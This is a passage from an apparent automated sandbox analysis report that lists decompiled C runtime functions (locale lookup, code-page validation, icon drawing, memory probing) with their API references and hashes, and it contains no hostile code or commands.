                                                                              • _strcat.LIBCMT ref: 0041A5F6
                                                                              • _strncpy.LIBCMT ref: 0041A60F
                                                                                • Part of subcall function 00412A4D: __lock.LIBCMT ref: 00412A6B
                                                                                • Part of subcall function 00412A4D: RtlFreeHeap.NTDLL(00000000,?,0044BC58,0000000C,004148DC,00000000,0044BD10,00000008,00414911,?,?,?,00414733,00000004,0044BD00,00000010), ref: 00412AB2
                                                                              • GetTimeZoneInformation.KERNEL32(0045A778,0044CC10,00000018,0041AB69,0044CC20,00000008,00414469,?,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 0041A678
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0045A77C,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 0041A706
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0045A7D0,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 0041A73A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone_strcat_strlen_strncpy
                                                                              • String ID:
                                                                              • API String ID: 3757401926-0
                                                                              • Opcode ID: c4df148090271f23cdefc9380149ed533d56eb713fac5672326856388b27c59e
                                                                              • Instruction ID: 05c7c564470ca1ff3fdab3cffd2eb7c3de4044b1506a1426b00658f94c95b8da
                                                                              • Opcode Fuzzy Hash: c4df148090271f23cdefc9380149ed533d56eb713fac5672326856388b27c59e
                                                                              • Instruction Fuzzy Hash: 8071EB7050A3509FD721AB29EC45AD67BF5EB55321F24013BE064872E2D738C9D2CB6E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041C4D8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 134COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 83%
                                                                              			E0041C4D8(void* __edx, intOrPtr* _a4, signed short _a8, signed short _a12) {
				void* __esi;
				signed short _t11;
				int _t13;
				int _t14;
				signed short _t15;
				signed short _t17;
				signed short _t19;
				signed short _t23;
				void* _t26;
				signed short _t27;
				int _t35;
				intOrPtr* _t38;
				void* _t39;
				short _t40;
				signed short _t42;
				intOrPtr* _t44;
				signed short _t45;
				void* _t47;
				intOrPtr _t49;
				intOrPtr _t58;
				intOrPtr _t62;

				_t39 = __edx;
				_t49 =  *0x45a860; // 0x0
				if(_t49 == 0) {
					if( *0x45a3f0 != 2) {
						 *0x45a860 = E0041BEA7;
					} else {
						 *0x45a860 = GetLocaleInfoA;
					}
				}
				_t44 = _a4;
				if(_t44 == 0) {
					L23:
					E0041BDF9();
					goto L24;
				} else {
					_t23 = _t44 + 0x40;
					_t38 = _t44;
					 *0x45a85c = _t38;
					 *0x45a854 = _t23;
					if(_t23 != 0 &&  *_t23 != 0) {
						E0041BD99(_t38, _t39, 0x44d3e0, 0x16, 0x45a854);
						_t38 =  *0x45a85c; // 0x0
						_t23 =  *0x45a854; // 0x0
						_t47 = _t47 + 0xc;
					}
					 *0x45a840 = 0;
					if(_t38 == 0 ||  *_t38 == 0) {
						__eflags = _t23;
						if(_t23 == 0) {
							goto L23;
						}
						__eflags =  *_t23;
						if(__eflags == 0) {
							goto L23;
						}
						E0041C3C6(__eflags);
						goto L24;
					} else {
						if(_t23 == 0) {
							L13:
							E0041C483(__eflags);
							L14:
							_t58 =  *0x45a840; // 0x0
							if(_t58 != 0) {
								L26:
								_t42 = E0041BE13(_t44 + 0x80, _t44);
								__eflags = _t42;
								if(_t42 == 0) {
									L38:
									_t11 = 0;
									__eflags = 0;
									L39:
									return _t11;
								}
								_t13 = IsValidCodePage(_t42 & 0x0000ffff);
								__eflags = _t13;
								if(_t13 == 0) {
									goto L38;
								}
								_t14 = IsValidLocale( *0x45a844, 1);
								__eflags = _t14;
								if(_t14 == 0) {
									goto L38;
								}
								_t15 = _a8;
								__eflags = _t15;
								_t35 =  *0x45a844; // 0x0
								if(_t15 != 0) {
									_t40 =  *0x45a848; // 0x0
									 *_t15 = _t35;
									 *((short*)(_t15 + 2)) = _t40;
									 *(_t15 + 4) = _t42;
								}
								_t45 = _a12;
								__eflags = _t45;
								if(_t45 == 0) {
									L37:
									_t11 = 1;
									goto L39;
								} else {
									__eflags =  *_t15 - 0x814;
									if( *_t15 != 0x814) {
										_t17 =  *0x45a860(_t35, 0x1001, _t45, 0x40);
										__eflags = _t17;
										if(_t17 == 0) {
											goto L38;
										}
										L35:
										_t19 =  *0x45a860( *0x45a848, 0x1002, _t45 + 0x40, 0x40);
										__eflags = _t19;
										if(_t19 == 0) {
											goto L38;
										}
										_t46 = _t45 + 0x80;
										__eflags = _t45 + 0x80;
										E00413F9B(_t42, _t46, 0xa);
										goto L37;
									}
									E00419460(_t45, "Norwegian-Nynorsk");
									goto L35;
								}
							}
							_t26 = E0041BD99(_t38, _t39, 0x44d590, 0x40, 0x45a85c);
							_t47 = _t47 + 0xc;
							if(_t26 == 0) {
								L24:
								_t62 =  *0x45a840; // 0x0
								if(_t62 != 0) {
									goto L26;
								}
								return 0;
							}
							_t27 =  *0x45a854; // 0x0
							if(_t27 == 0) {
								L19:
								E0041C483(__eflags);
								goto L24;
							}
							_t61 =  *_t27;
							if( *_t27 == 0) {
								goto L19;
							}
							E0041C3FD(_t61);
							goto L24;
						}
						_t57 =  *_t23;
						if( *_t23 == 0) {
							goto L13;
						}
						E0041C3FD(_t57);
						goto L14;
					}
				}
			}
























                                                                              0x0041c4d8
                                                                              0x0041c4db
                                                                              0x0041c4e2
                                                                              0x0041c4eb
                                                                              0x0041c4f9
                                                                              0x0041c4ed
                                                                              0x0041c4f2
                                                                              0x0041c4f2
                                                                              0x0041c4eb
                                                                              0x0041c503
                                                                              0x0041c509
                                                                              0x0041c5b2
                                                                              0x0041c5b2
                                                                              0x00000000
                                                                              0x0041c50f
                                                                              0x0041c50f
                                                                              0x0041c514
                                                                              0x0041c516
                                                                              0x0041c51c
                                                                              0x0041c521
                                                                              0x0041c533
                                                                              0x0041c538
                                                                              0x0041c53e
                                                                              0x0041c543
                                                                              0x0041c543
                                                                              0x0041c548
                                                                              0x0041c54e
                                                                              0x0041c5a3
                                                                              0x0041c5a5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c5a7
                                                                              0x0041c5a9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c5ab
                                                                              0x00000000
                                                                              0x0041c554
                                                                              0x0041c556
                                                                              0x0041c563
                                                                              0x0041c563
                                                                              0x0041c568
                                                                              0x0041c568
                                                                              0x0041c56e
                                                                              0x0041c5c6
                                                                              0x0041c5d2
                                                                              0x0041c5d4
                                                                              0x0041c5d6
                                                                              0x0041c687
                                                                              0x0041c687
                                                                              0x0041c687
                                                                              0x0041c689
                                                                              0x00000000
                                                                              0x0041c689
                                                                              0x0041c5e0
                                                                              0x0041c5e6
                                                                              0x0041c5e8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c5f6
                                                                              0x0041c5fc
                                                                              0x0041c5fe
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c604
                                                                              0x0041c608
                                                                              0x0041c60a
                                                                              0x0041c610
                                                                              0x0041c612
                                                                              0x0041c619
                                                                              0x0041c61c
                                                                              0x0041c620
                                                                              0x0041c620
                                                                              0x0041c624
                                                                              0x0041c628
                                                                              0x0041c62a
                                                                              0x0041c682
                                                                              0x0041c684
                                                                              0x00000000
                                                                              0x0041c62c
                                                                              0x0041c62c
                                                                              0x0041c631
                                                                              0x0041c64b
                                                                              0x0041c651
                                                                              0x0041c653
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c655
                                                                              0x0041c666
                                                                              0x0041c66c
                                                                              0x0041c66e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c672
                                                                              0x0041c672
                                                                              0x0041c67a
                                                                              0x00000000
                                                                              0x0041c67f
                                                                              0x0041c639
                                                                              0x00000000
                                                                              0x0041c63f
                                                                              0x0041c62a
                                                                              0x0041c57c
                                                                              0x0041c581
                                                                              0x0041c586
                                                                              0x0041c5b7
                                                                              0x0041c5b7
                                                                              0x0041c5bd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c5bf
                                                                              0x0041c588
                                                                              0x0041c58f
                                                                              0x0041c59c
                                                                              0x0041c59c
                                                                              0x00000000
                                                                              0x0041c59c
                                                                              0x0041c591
                                                                              0x0041c593
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c595
                                                                              0x00000000
                                                                              0x0041c595
                                                                              0x0041c558
                                                                              0x0041c55a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c55c
                                                                              0x00000000
                                                                              0x0041c55c
                                                                              0x0041c54e

                                                                              APIs
                                                                              • _TranslateName.LIBCMT ref: 0041C533
                                                                              • _TranslateName.LIBCMT ref: 0041C57C
                                                                              • IsValidCodePage.KERNEL32(00000000,00000082,?,004575B8,00415BC9,?,0045A5A4,?), ref: 0041C5E0
                                                                              • IsValidLocale.KERNEL32(00000001), ref: 0041C5F6
                                                                              • _strcat.LIBCMT ref: 0041C639
                                                                                • Part of subcall function 0041C3C6: _strlen.LIBCMT ref: 0041C3CC
                                                                                • Part of subcall function 0041C3C6: EnumSystemLocalesA.KERNEL32(0041BFDC,00000001,?,004575B8,00415BC9,?,0045A5A4,?), ref: 0041C3E6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: NameTranslateValid$CodeEnumLocaleLocalesPageSystem_strcat_strlen
                                                                              • String ID: Norwegian-Nynorsk
                                                                              • API String ID: 4291917928-461349085
                                                                              • Opcode ID: 3274789666a885fe8ed958e051d681dbe9903669499eaa5615e12319ce4fc219
                                                                              • Instruction ID: 00232410e82f7a70b6d046ee000cc258d66e2577bc9921bac4075e365f45b0e2
                                                                              • Opcode Fuzzy Hash: 3274789666a885fe8ed958e051d681dbe9903669499eaa5615e12319ce4fc219
                                                                              • Instruction Fuzzy Hash: B641D5B16C4350BADB30AF219CC1AA637A6AB10745B08463FE60197252D76DE8D5C62F
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041EEE9, Relevance: 9.1, APIs: 6, Instructions: 102COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 60%
                                                                              			E0041EEE9(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t31;
				int _t32;
				int _t44;
				int _t48;
				void* _t49;
				short* _t53;
				void* _t58;
				short* _t59;
				intOrPtr _t62;

				_t49 = __ecx;
				_push(0x18);
				_push(0x44dd08);
				E00412BA4(__ebx, __edi, __esi);
				_t62 =  *0x45a8c0; // 0x0
				if(_t62 == 0) {
					if(GetLocaleInfoW(0, 1, 0, 0) == 0) {
						if(GetLastError() == 0x78) {
							 *0x45a8c0 = 2;
						}
					} else {
						 *0x45a8c0 = 1;
					}
				}
				_t31 =  *0x45a8c0; // 0x0
				if(_t31 == 2 || _t31 == 0) {
					_t32 = GetLocaleInfoA( *(_t58 + 8),  *(_t58 + 0xc),  *(_t58 + 0x10),  *(_t58 + 0x14));
					goto L25;
				} else {
					if(_t31 != 1) {
						L11:
						_t32 = 0;
						L25:
						return E00412BDF(_t32);
					}
					 *(_t58 - 0x1c) = 0;
					 *((intOrPtr*)(_t58 - 0x20)) = 0;
					if( *(_t58 + 0x18) == 0) {
						_t44 =  *0x45a740; // 0x0
						 *(_t58 + 0x18) = _t44;
					}
					_t48 = GetLocaleInfoW( *(_t58 + 8),  *(_t58 + 0xc), 0, 0);
					 *(_t58 - 0x24) = _t48;
					if(_t48 != 0) {
						 *(_t58 - 4) = 0;
						E00412260(_t48 + _t48 + 0x00000003 & 0xfffffffc, _t49);
						 *(_t58 - 0x18) = _t59;
						_t53 = _t59;
						 *(_t58 - 0x28) = _t53;
						 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
						if(_t53 != 0) {
							L16:
							if(GetLocaleInfoW( *(_t58 + 8),  *(_t58 + 0xc), _t53, _t48) != 0) {
								_push(0);
								_push(0);
								if( *(_t58 + 0x14) != 0) {
									_push( *(_t58 + 0x14));
									_push( *(_t58 + 0x10));
								} else {
									_push(0);
									_push(0);
								}
								 *(_t58 - 0x1c) = WideCharToMultiByte( *(_t58 + 0x18), 0, _t53, 0xffffffff, ??, ??, ??, ??);
							}
							if( *((intOrPtr*)(_t58 - 0x20)) != 0) {
								_push(_t53);
								E00412A4D();
							}
							_t32 =  *(_t58 - 0x1c);
							goto L25;
						} else {
							_t53 = E00412247(_t48 + _t48);
							if(_t53 == 0) {
								goto L11;
							}
							 *((intOrPtr*)(_t58 - 0x20)) = 1;
							goto L16;
						}
					} else {
						goto L11;
					}
				}
			}












                                                                              0x0041eee9
                                                                              0x0041eee9
                                                                              0x0041eeeb
                                                                              0x0041eef0
                                                                              0x0041eef7
                                                                              0x0041eefd
                                                                              0x0041ef0e
                                                                              0x0041ef21
                                                                              0x0041ef23
                                                                              0x0041ef23
                                                                              0x0041ef10
                                                                              0x0041ef10
                                                                              0x0041ef10
                                                                              0x0041ef0e
                                                                              0x0041ef2d
                                                                              0x0041ef35
                                                                              0x0041f01a
                                                                              0x00000000
                                                                              0x0041ef43
                                                                              0x0041ef46
                                                                              0x0041ef72
                                                                              0x0041ef72
                                                                              0x0041f020
                                                                              0x0041f028
                                                                              0x0041f028
                                                                              0x0041ef48
                                                                              0x0041ef4b
                                                                              0x0041ef51
                                                                              0x0041ef53
                                                                              0x0041ef58
                                                                              0x0041ef58
                                                                              0x0041ef69
                                                                              0x0041ef6b
                                                                              0x0041ef70
                                                                              0x0041ef79
                                                                              0x0041ef85
                                                                              0x0041ef8a
                                                                              0x0041ef8d
                                                                              0x0041ef8f
                                                                              0x0041ef92
                                                                              0x0041efb1
                                                                              0x0041efca
                                                                              0x0041efda
                                                                              0x0041efdc
                                                                              0x0041efdd
                                                                              0x0041efe1
                                                                              0x0041efe7
                                                                              0x0041efea
                                                                              0x0041efe3
                                                                              0x0041efe3
                                                                              0x0041efe4
                                                                              0x0041efe4
                                                                              0x0041effa
                                                                              0x0041effa
                                                                              0x0041f000
                                                                              0x0041f002
                                                                              0x0041f003
                                                                              0x0041f008
                                                                              0x0041f009
                                                                              0x00000000
                                                                              0x0041efb3
                                                                              0x0041efbd
                                                                              0x0041efc1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041efc3
                                                                              0x00000000
                                                                              0x0041efc3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041ef70

                                                                              APIs
                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,0044DD08,00000018,0041D94B,?,?,?,00000080,00000000,?,?,00000001), ref: 0041EF06
                                                                              • GetLastError.KERNEL32(?,?,00000001), ref: 0041EF18
                                                                              • GetLocaleInfoW.KERNEL32(00000001,?,00000000,00000000,0044DD08,00000018,0041D94B,?,?,?,00000080,00000000,?,?,00000001), ref: 0041EF63
                                                                              • GetLocaleInfoW.KERNEL32(00000001,?,?,00000000,?,?,00000001), ref: 0041EFD2
                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,?,?,00000000,00000000,?,00000000,?,?,00000001), ref: 0041EFF4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale$ByteCharErrorLastMultiWide
                                                                              • String ID:
                                                                              • API String ID: 97497842-0
                                                                              • Opcode ID: 9d590b2233e44e0d5c768544717aa255f43cdbf16b7c90808ddced4e37fb9822
                                                                              • Instruction ID: e007cc0f8e5f1451c7401b50cf073b8261ccd2464fa2b40d7b1b5eaf5d8a320d
                                                                              • Opcode Fuzzy Hash: 9d590b2233e44e0d5c768544717aa255f43cdbf16b7c90808ddced4e37fb9822
                                                                              • Instruction Fuzzy Hash: 0D31BE35800229BBCF229F52DD449DF7F75FF497A0B100126FC15962A1C77889A2DFA9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041EDB9, Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 70%
                                                                              			E0041EDB9(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t31;
				int _t32;
				int _t37;
				int _t42;
				void* _t48;
				char* _t54;
				void* _t55;
				char* _t56;
				intOrPtr _t59;

				_t48 = __ecx;
				_push(0x18);
				_push(0x44dcf8);
				E00412BA4(__ebx, __edi, __esi);
				_t59 =  *0x45a8bc; // 0x0
				if(_t59 == 0) {
					if(GetLocaleInfoW(0, 1, 0, 0) == 0) {
						if(GetLastError() == 0x78) {
							 *0x45a8bc = 2;
						}
					} else {
						 *0x45a8bc = 1;
					}
				}
				_t31 =  *0x45a8bc; // 0x0
				if(_t31 != 1) {
					if(_t31 == 2 || _t31 == 0) {
						 *(_t55 - 0x1c) = 0;
						 *((intOrPtr*)(_t55 - 0x24)) = 0;
						if( *(_t55 + 0x18) == 0) {
							_t42 =  *0x45a740; // 0x0
							 *(_t55 + 0x18) = _t42;
						}
						_t32 = GetLocaleInfoA( *(_t55 + 8),  *(_t55 + 0xc), 0, 0);
						 *(_t55 - 0x20) = _t32;
						if(_t32 != 0) {
							 *(_t55 - 4) = 0;
							E00412260(_t32 + 0x00000003 & 0xfffffffc, _t48);
							 *(_t55 - 0x18) = _t56;
							_t54 = _t56;
							 *(_t55 - 0x28) = _t54;
							 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
							if(_t54 != 0) {
								L17:
								if(GetLocaleInfoA( *(_t55 + 8),  *(_t55 + 0xc), _t54,  *(_t55 - 0x20)) != 0) {
									if( *(_t55 + 0x14) != 0) {
										_push( *(_t55 + 0x14));
										_push( *(_t55 + 0x10));
									} else {
										_push(0);
										_push(0);
									}
									 *(_t55 - 0x1c) = MultiByteToWideChar( *(_t55 + 0x18), 1, _t54, 0xffffffff, ??, ??);
								}
								if( *((intOrPtr*)(_t55 - 0x24)) != 0) {
									_push(_t54);
									E00412A4D();
								}
								_t37 =  *(_t55 - 0x1c);
								goto L25;
							} else {
								_t54 = E00412247( *(_t55 - 0x20));
								if(_t54 == 0) {
									goto L12;
								}
								 *((intOrPtr*)(_t55 - 0x24)) = 1;
								goto L17;
							}
						} else {
							goto L12;
						}
					} else {
						L12:
						_t37 = 0;
						goto L25;
					}
				} else {
					_t37 = GetLocaleInfoW( *(_t55 + 8),  *(_t55 + 0xc),  *(_t55 + 0x10),  *(_t55 + 0x14));
					L25:
					return E00412BDF(_t37);
				}
			}












                                                                              0x0041edb9
                                                                              0x0041edb9
                                                                              0x0041edbb
                                                                              0x0041edc0
                                                                              0x0041edca
                                                                              0x0041edd0
                                                                              0x0041edde
                                                                              0x0041edf1
                                                                              0x0041edf3
                                                                              0x0041edf3
                                                                              0x0041ede0
                                                                              0x0041ede0
                                                                              0x0041ede0
                                                                              0x0041edde
                                                                              0x0041edfd
                                                                              0x0041ee04
                                                                              0x0041ee20
                                                                              0x0041ee26
                                                                              0x0041ee29
                                                                              0x0041ee2f
                                                                              0x0041ee31
                                                                              0x0041ee36
                                                                              0x0041ee36
                                                                              0x0041ee41
                                                                              0x0041ee47
                                                                              0x0041ee4c
                                                                              0x0041ee55
                                                                              0x0041ee5e
                                                                              0x0041ee63
                                                                              0x0041ee66
                                                                              0x0041ee68
                                                                              0x0041ee6b
                                                                              0x0041ee8a
                                                                              0x0041ee9e
                                                                              0x0041eeb0
                                                                              0x0041eeb5
                                                                              0x0041eebb
                                                                              0x0041eebe
                                                                              0x0041eeb7
                                                                              0x0041eeb7
                                                                              0x0041eeb8
                                                                              0x0041eeb8
                                                                              0x0041eece
                                                                              0x0041eece
                                                                              0x0041eed4
                                                                              0x0041eed6
                                                                              0x0041eed7
                                                                              0x0041eedc
                                                                              0x0041eedd
                                                                              0x00000000
                                                                              0x0041ee8c
                                                                              0x0041ee95
                                                                              0x0041ee99
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041ee9b
                                                                              0x00000000
                                                                              0x0041ee9b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041ee4e
                                                                              0x0041ee4e
                                                                              0x0041ee4e
                                                                              0x00000000
                                                                              0x0041ee4e
                                                                              0x0041ee06
                                                                              0x0041ee12
                                                                              0x0041eee0
                                                                              0x0041eee8
                                                                              0x0041eee8

                                                                              APIs
                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,0044DCF8,00000018,0041D9FF,?,?,0045A8A0,00000004,00000000,?,?,00000001), ref: 0041EDD6
                                                                              • GetLastError.KERNEL32(?,?,00000001), ref: 0041EDE8
                                                                              • GetLocaleInfoW.KERNEL32(00000001,?,?,?,0044DCF8,00000018,0041D9FF,?,?,0045A8A0,00000004,00000000,?,?,00000001), ref: 0041EE12
                                                                              • GetLocaleInfoA.KERNEL32(00000001,?,00000000,00000000,0044DCF8,00000018,0041D9FF,?,?,0045A8A0,00000004,00000000,?,?,00000001), ref: 0041EE41
                                                                              • GetLocaleInfoA.KERNEL32(00000001,?,?,?,?,?,00000001), ref: 0041EEA8
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,000000FF,?,?,?,?,?,?,00000001), ref: 0041EEC8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale$ByteCharErrorLastMultiWide
                                                                              • String ID:
                                                                              • API String ID: 97497842-0
                                                                              • Opcode ID: 200fb1cbaff66e5ce5a989645fd354206ff0890dbd2b156a45fb76902c2de206
                                                                              • Instruction ID: 54b6771861c02535a4a1919487b393c99c77f57161f5eea6cfd01570bb809de6
                                                                              • Opcode Fuzzy Hash: 200fb1cbaff66e5ce5a989645fd354206ff0890dbd2b156a45fb76902c2de206
                                                                              • Instruction Fuzzy Hash: 31318D75800219EFCF229F52DD458EF7FB5FF48350B24012AF825A1260C73989A1DB59
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040658E, Relevance: 9.1, APIs: 6, Instructions: 59windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 76%
                                                                              			E0040658E(void* __ecx, void* __edx) {
				struct tagRECT _v20;
				int _v100;
				char _v104;
				void* __esi;
				void* __ebp;
				int _t14;
				int _t18;
				int _t19;
				void* _t43;
				void* _t48;

				_t43 = __edx;
				_t48 = __ecx;
				_t14 = IsIconic( *(__ecx + 0x1c));
				_t49 = _t14;
				if(_t14 == 0) {
					return E004244EE(_t48, _t48, __eflags);
				}
				_push(_t48);
				E0042A8EF( &_v104, _t49);
				SendMessageA( *(_t48 + 0x1c), 0x27, _v100, 0);
				_t18 = GetSystemMetrics(0xb);
				_t19 = GetSystemMetrics(0xc);
				GetClientRect( *(_t48 + 0x1c),  &_v20);
				asm("cdq");
				asm("cdq");
				DrawIcon(_v100, _v20.right - _v20.left - _t18 + 1 - _t43 >> 1, _v20.bottom - _v20.top - _t19 + 1 - _t43 >> 1,  *(_t48 + 0x128));
				return E0042A94A( &_v104);
			}













                                                                              0x0040658e
                                                                              0x00406595
                                                                              0x0040659a
                                                                              0x004065a0
                                                                              0x004065a2
                                                                              0x00000000
                                                                              0x00406619
                                                                              0x004065a6
                                                                              0x004065aa
                                                                              0x004065b9
                                                                              0x004065c7
                                                                              0x004065cd
                                                                              0x004065d8
                                                                              0x004065ed
                                                                              0x004065fc
                                                                              0x00406605
                                                                              0x00000000

                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 0040659A
                                                                                • Part of subcall function 0042A8EF: __EH_prolog.LIBCMT ref: 0042A8F4
                                                                                • Part of subcall function 0042A8EF: BeginPaint.USER32(?,?,?,?,0042450F), ref: 0042A922
                                                                              • SendMessageA.USER32(?,00000027,?,00000000), ref: 004065B9
                                                                              • GetSystemMetrics.USER32 ref: 004065C7
                                                                              • GetSystemMetrics.USER32 ref: 004065CD
                                                                              • GetClientRect.USER32 ref: 004065D8
                                                                              • DrawIcon.USER32 ref: 00406605
                                                                                • Part of subcall function 0042A94A: __EH_prolog.LIBCMT ref: 0042A94F
                                                                                • Part of subcall function 0042A94A: EndPaint.USER32(?,?,?,?,00424535,?), ref: 0042A96C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prologMetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
                                                                              • String ID:
                                                                              • API String ID: 1530917984-0
                                                                              • Opcode ID: d45645eda47242d574d3f8079dd56a37a59257f7d3b303e590f4d4dd3aeec0a0
                                                                              • Instruction ID: 3f53dcad62a1f253b9851b680a0da769e3bd4db854b06cb9bf60b3b287718ca7
                                                                              • Opcode Fuzzy Hash: d45645eda47242d574d3f8079dd56a37a59257f7d3b303e590f4d4dd3aeec0a0
                                                                              • Instruction Fuzzy Hash: 4E11A971600215AFCB10AFB8EE09DAEBBB9EB84300F154535F542E7190CAB1ED15DB04
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00412ABE, Relevance: 7.6, APIs: 5, Instructions: 92memoryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 86%
                                                                              			E00412ABE(void* __ecx, void* __eflags) {
				void* _v8;
				long _v12;
				long _v16;
				signed char _v23;
				struct _MEMORY_BASIC_INFORMATION _v44;
				struct _SYSTEM_INFO _v80;
				void* _v92;
				void* _t29;
				int _t33;
				intOrPtr _t35;
				void* _t43;
				void* _t46;
				signed int _t49;
				void* _t54;
				void* _t55;
				void* _t62;
				void* _t63;

				_t29 = 4;
				E00412260(_t29, __ecx);
				_t55 = _t63;
				if(VirtualQuery(_t55,  &_v44, 0x1c) == 0) {
					L9:
					_t33 = 0;
				} else {
					_t46 = _v44.AllocationBase;
					GetSystemInfo( &_v80);
					_t49 = _v80.dwPageSize;
					_t35 =  *0x45a3f0; // 0x2
					_t54 = ( !(_t49 - 1) & _t55) - _t49;
					asm("sbb esi, esi");
					_t62 = (( ~(_t35 - 1) & 0xfffffff1) + 0x11) * _t49 + _t46;
					_v12 = _t49;
					if(_t54 < _t62) {
						goto L9;
					} else {
						if(_t35 == 1) {
							_v8 = _t54;
							goto L14;
						} else {
							_v8 = _t46;
